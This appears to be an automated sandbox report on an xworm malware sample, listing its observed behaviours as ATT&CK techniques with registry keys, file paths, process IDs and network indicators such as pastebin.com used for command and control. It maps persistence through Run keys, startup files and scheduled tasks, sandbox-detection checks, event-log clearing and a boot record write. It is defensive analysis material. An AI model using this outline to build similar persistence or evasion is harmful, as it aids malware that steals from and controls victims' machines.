xworm | 8447ead3867613cf99681b3702f32486e30bef2094090465034a8f9aa6b5d85b

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	$77Test.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	$77Client.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Client.lnk	$77Client.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Client.lnk	$77Client.exe

Executes dropped EXE 3 IoCs

pid	Process
2780	$77Client.exe
2692	$77Installer.exe
2564	$77Client.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Client = "C:\\Users\\Public\\$77Client.exe"	$77Client.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3444	powershell.EXE

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

flow	ioc
33	pastebin.com
39	pastebin.com
55	pastebin.com
56	pastebin.com
54	pastebin.com
53	pastebin.com
57	pastebin.com
29	pastebin.com
36	pastebin.com
37	pastebin.com
38	pastebin.com
50	pastebin.com
52	pastebin.com
20	pastebin.com
21	pastebin.com
28	pastebin.com
51	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\$77Client	svchost.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77Installer.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 58 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018001210319D6F"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000847cc0e5cd200b4fb62542c4c7edf4a800000000020000000000106600000001000020000000da4185759d6aad280e37a7b84cdeb59244333db867cd4918654ab96c27a9a12c000000000e80000000020000200000000d65e94687e16676c735ae6426642fc7d6e4c553e5189b37862db0c1e6344b46b00300004f4c49f837a5bae4c3822c27ca77299345af86940122689d48f55d1b391680fd43e95310db51a3403351386d220202439235c859d20f62dc879334896b5d8baede9b3b9093d06d746d6a732cd57541ad16c229b55408433669e37d5892c0587839c843a86b9d9be964b4a66086a48b56f3407240a462864abe8160354f0ff5f3e0802fa2c6c9c407ecdd441ea8ba07646923739df2c61d375c5bc2a54e7a95849616b96733f250527c0c18055a51b2f08a33d7027b7148b30c2d134e008959df2db01effbc5152b14ed81583294f3876861d85d400c215fc212c48d1aa7e80fed8f388d9178b41919d2a8704fde8596f01acfd2752188fc5652a42b0c4beee3704a1791a532c2ff62baf2b38626dbf550c597897614cb5b77a55a67321538a043b4430ff2c3e2bb0e61dd169edb85b2de18252dd17d9781a134d8e75c9c557399bd330b03f1e4298be0e6587571740338f8a1341092a643055c87038a3833c9df2697b8b708ee9dae8c2badbceac617a18528f189b206210f7e9bfaae0d0623321e0bfc9c6d51b7b4830e1753e540d8e9d64d2aa224b4e7cc48ad5573f9312f02f00d898bb312e4e60e3e029fc0e2371923ffd5a511085cc5669df5abc0ce9e5a78494434ce55a953fe33489ea0f47f84ffdce73bfff38c324d5e88409aa129c545e365aa5cfef63abb859c324956195899c17e83e77caa2b07ee9197a08df532ebb285aa5890261d5430f177242ca835080ca64360bfde309c255e3faecaa03bd19bfc7f849a863ed27ed538f7f8b37ec386da48cf430d619fa4d133f81a53b2cf897d44ad57f0b60bf05f7a43580890dd62edd91e30fb9a2312c8d156c28320af518d2cf5f7f3c9fb22e109c9b2a2e0122ef4d79465341a7af67c73af15d7ed089a34784e90bc28761118614ee43cae95530e33b7f58802b30025cc4d30cd9d12b47aac68b9929fd366cc8ab0c5a79e2832d0bf7e31ed56cb248464cbabc0e6690789f758d850b8a5bc3b261ad387b18218fdf24e2d542a4c5fa140f04b3d440d0adaf153ddc8c782f177cbe9535bd072234b2854fdf0df8f663f64337f6fadcfca16ac49d2bd665d7b58e0556063dad31dede2823a5e6d904f187ac64af981b36d70ce728d398f58449f85cfeb84720e2b87da237d81c8ddd5ff03e764e7d0612acc8a4e47c9fc90079877d3c46643d691cb47e72a5bac4b59bb2454741a8a8a08097d689dba3a07fd08a6554552824929782d35b82b2cf03e50e3adbde3ea7c5c76462cbad85f9fdf4988103e34267e2994d8b0df56ca3f9fc4f4f6b27b08228f8ff27a6dfc55ba24697d586f16440000000c97d4a1df7c170cd7f7adef728a7f2d5e4bc05be63310450378e30320fe62ac31c5fcd1d83a9a9acf50305e16cccff154b9a4fb9f1d6674799b7cc0906ca0afb	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018001210319D6F = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000847cc0e5cd200b4fb62542c4c7edf4a8000000000200000000001066000000010000200000000e83d58342d2e4c5e5e678fe668419913e7e8b13ce9018e3d771e6929225af0a000000000e8000000002000020000000a7c427ef51c092210e88a72c5e446f8ef11ad7b7d18d8ed0dc06366051e9a365800000009f38a63f42d39245cbdb08ecd5f45a9122fd38a74d0a28cd875c662cf2d1c9f6345ac46dbba725eac93e3c6cd07cbdf33ca186fdb51015b704e60e228aec22fa8a0940c1ab3706aa603e30afdcd6c4f4b836a0286c0a5fe743bb732a6cd5220e347ae479b3c0bf1bb5948bd07329bf995606d6d0d9cea963b72480e5af55fadb400000009a0642fe38e07c9623ab7db8c359870d5ec96ac528cda86490622e363965deaafc384a6ca702beb0735101d7ed8459d62c37b6d919f87dd0a5c61f077aada35d	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018001210319D6F"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe

Modifies registry class 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3344	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3444	powershell.EXE
3444	powershell.EXE
3444	powershell.EXE
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
620	winlogon.exe
620	winlogon.exe
2100	wmiprvse.exe
2100	wmiprvse.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe
620	winlogon.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3604	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	$77Client.exe
Token: SeDebugPrivilege	3444	powershell.EXE
Token: SeDebugPrivilege	3444	powershell.EXE
Token: SeDebugPrivilege	620	winlogon.exe
Token: SeShutdownPrivilege	1916	svchost.exe
Token: SeCreatePagefilePrivilege	1916	svchost.exe
Token: SeShutdownPrivilege	1916	svchost.exe
Token: SeCreatePagefilePrivilege	1916	svchost.exe
Token: SeShutdownPrivilege	1916	svchost.exe
Token: SeCreatePagefilePrivilege	1916	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2028	svchost.exe
Token: SeIncreaseQuotaPrivilege	2028	svchost.exe
Token: SeSecurityPrivilege	2028	svchost.exe
Token: SeTakeOwnershipPrivilege	2028	svchost.exe
Token: SeLoadDriverPrivilege	2028	svchost.exe
Token: SeBackupPrivilege	2028	svchost.exe
Token: SeRestorePrivilege	2028	svchost.exe
Token: SeShutdownPrivilege	2028	svchost.exe
Token: SeSystemEnvironmentPrivilege	2028	svchost.exe
Token: SeManageVolumePrivilege	2028	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2028	svchost.exe
Token: SeIncreaseQuotaPrivilege	2028	svchost.exe
Token: SeSecurityPrivilege	2028	svchost.exe
Token: SeTakeOwnershipPrivilege	2028	svchost.exe
Token: SeLoadDriverPrivilege	2028	svchost.exe
Token: SeSystemtimePrivilege	2028	svchost.exe
Token: SeBackupPrivilege	2028	svchost.exe
Token: SeRestorePrivilege	2028	svchost.exe
Token: SeShutdownPrivilege	2028	svchost.exe
Token: SeSystemEnvironmentPrivilege	2028	svchost.exe
Token: SeUndockPrivilege	2028	svchost.exe
Token: SeManageVolumePrivilege	2028	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2028	svchost.exe
Token: SeIncreaseQuotaPrivilege	2028	svchost.exe
Token: SeSecurityPrivilege	2028	svchost.exe
Token: SeTakeOwnershipPrivilege	2028	svchost.exe
Token: SeLoadDriverPrivilege	2028	svchost.exe
Token: SeSystemtimePrivilege	2028	svchost.exe
Token: SeBackupPrivilege	2028	svchost.exe
Token: SeRestorePrivilege	2028	svchost.exe
Token: SeShutdownPrivilege	2028	svchost.exe
Token: SeSystemEnvironmentPrivilege	2028	svchost.exe
Token: SeUndockPrivilege	2028	svchost.exe
Token: SeManageVolumePrivilege	2028	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2028	svchost.exe
Token: SeIncreaseQuotaPrivilege	2028	svchost.exe
Token: SeSecurityPrivilege	2028	svchost.exe
Token: SeTakeOwnershipPrivilege	2028	svchost.exe
Token: SeLoadDriverPrivilege	2028	svchost.exe
Token: SeSystemtimePrivilege	2028	svchost.exe
Token: SeBackupPrivilege	2028	svchost.exe
Token: SeRestorePrivilege	2028	svchost.exe
Token: SeShutdownPrivilege	2028	svchost.exe
Token: SeSystemEnvironmentPrivilege	2028	svchost.exe
Token: SeUndockPrivilege	2028	svchost.exe
Token: SeManageVolumePrivilege	2028	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2028	svchost.exe
Token: SeIncreaseQuotaPrivilege	2028	svchost.exe
Token: SeSecurityPrivilege	2028	svchost.exe
Token: SeTakeOwnershipPrivilege	2028	svchost.exe
Token: SeLoadDriverPrivilege	2028	svchost.exe
Token: SeSystemtimePrivilege	2028	svchost.exe
Token: SeBackupPrivilege	2028	svchost.exe
Token: SeRestorePrivilege	2028	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3604	Explorer.EXE
3604	Explorer.EXE
3604	Explorer.EXE
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3604	Explorer.EXE
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe
3872	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3836	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 372 wrote to memory of 2780	372	$77Test.exe	83
PID 372 wrote to memory of 2780	372	$77Test.exe	83
PID 372 wrote to memory of 2692	372	$77Test.exe	84
PID 372 wrote to memory of 2692	372	$77Test.exe	84
PID 372 wrote to memory of 2692	372	$77Test.exe	84
PID 3444 wrote to memory of 620	3444	powershell.EXE	5
PID 620 wrote to memory of 676	620	winlogon.exe	7
PID 620 wrote to memory of 960	620	winlogon.exe	12
PID 620 wrote to memory of 408	620	winlogon.exe	13
PID 620 wrote to memory of 700	620	winlogon.exe	14
PID 620 wrote to memory of 880	620	winlogon.exe	15
PID 620 wrote to memory of 908	620	winlogon.exe	16
PID 620 wrote to memory of 1056	620	winlogon.exe	17
PID 620 wrote to memory of 1092	620	winlogon.exe	18
PID 620 wrote to memory of 1140	620	winlogon.exe	19
PID 620 wrote to memory of 1228	620	winlogon.exe	20
PID 620 wrote to memory of 1268	620	winlogon.exe	21
PID 620 wrote to memory of 1392	620	winlogon.exe	23
PID 620 wrote to memory of 1504	620	winlogon.exe	24
PID 620 wrote to memory of 1524	620	winlogon.exe	25
PID 620 wrote to memory of 1540	620	winlogon.exe	26
